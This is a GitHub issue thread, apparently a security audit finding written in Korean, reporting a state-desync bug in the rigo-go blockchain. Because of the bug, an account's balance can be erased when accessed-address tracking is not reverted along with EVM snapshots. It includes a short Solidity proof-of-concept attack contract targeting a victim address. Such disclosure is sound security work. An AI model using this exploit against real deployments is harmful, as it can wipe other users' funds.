### ISSUE TITLE
HAECHI Report - 21

### ISSUE THREAD

**Issue by kyle-themedium** [rigochain/rigo-go#66]
impact: 임의 account의 balance를 강제로 삭제시킬 수 있습니다.
description:
rigo는 rigo와 evm  간의 state를 동기화 시켜주기 위해 accessedObjAddrs 를 만들어 관리하고 있습니다.
evm의 transaction 상에서 새로운 account에 접근 (accessedObjAddrs에 접근했던 account를 기록해놨다가 transaction 상에서 첫 접근인지 여부 판단)
rigo-state에서 account 정보를 불러와서 evm-state에 기록
한 트랜잭션이 종료되고나서 ApplyTo가 실행될 때 evm에서 접근한 account 에 대한 정보를 rigo-state에 작성하기
만약 accessedObjAddrs 에 기록되었지만 실제로 rigo-state의 정보가 evm-state에 반영이 안되었다면 rigo-state와 evm-state와의 데이터 정합성이 깨지게 됩니다.
evm에서는 snapshot을 사용해서 revert 발생 시 state를 revert 발생 이전으로 변경시키지만 accessedObjAddrs의 경우 snapshot이 발생해도 돌아가지 않습니다.
즉 revert가 발생하는 곳에서 되돌려지는 account는 evm state에서는 삭제되지만 accessedObjAddrs에는 존재하는 상태가 되게됩니다.
이로 인해 rigo-state와 evm-state의 정합성이 깨지게 되며, evm 을 이용한적이 없는 account는 balance, nonce가 0인 상태가 되게 되고, 트랜잭션이 종료될 때는 ApplyTo에서 evm-state를 rigo-state에 쓰게 됩니다.
이것을 이용해서 임의 account의 balance를 삭제할 수 있습니다.
recommendation:
snapshot과 동일하게 작동하게 구현합니다.
공격에 사용된 컨트랙트 코드입니다.
```
contract Attack {
    constructor () payable {
        Caller caller = new Caller(); // nonce = 1

        // uint8 nonce = 0x02;
        // b = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), address(this), bytes1(nonce))))));
        // address(c).call(abi.encodeWithSelector(Caller.revertCall.selector, b)); // make warm address

        address victim = 0x000000000000000000000000000000000000dEaD;
        address(caller).call(abi.encodeWithSelector(Caller.revertCall.selector, victim)); // make warm address
        victim.call{value: 1}(""); // set balance 1
    }
}
```
공격에 사용된 test script입니다.
https://gist.github.com/jinukaloshaechi/6b32d97ae3a021c69743436e46a0b64e

**Comment by kalos-security** [comment]
확인했습니다.
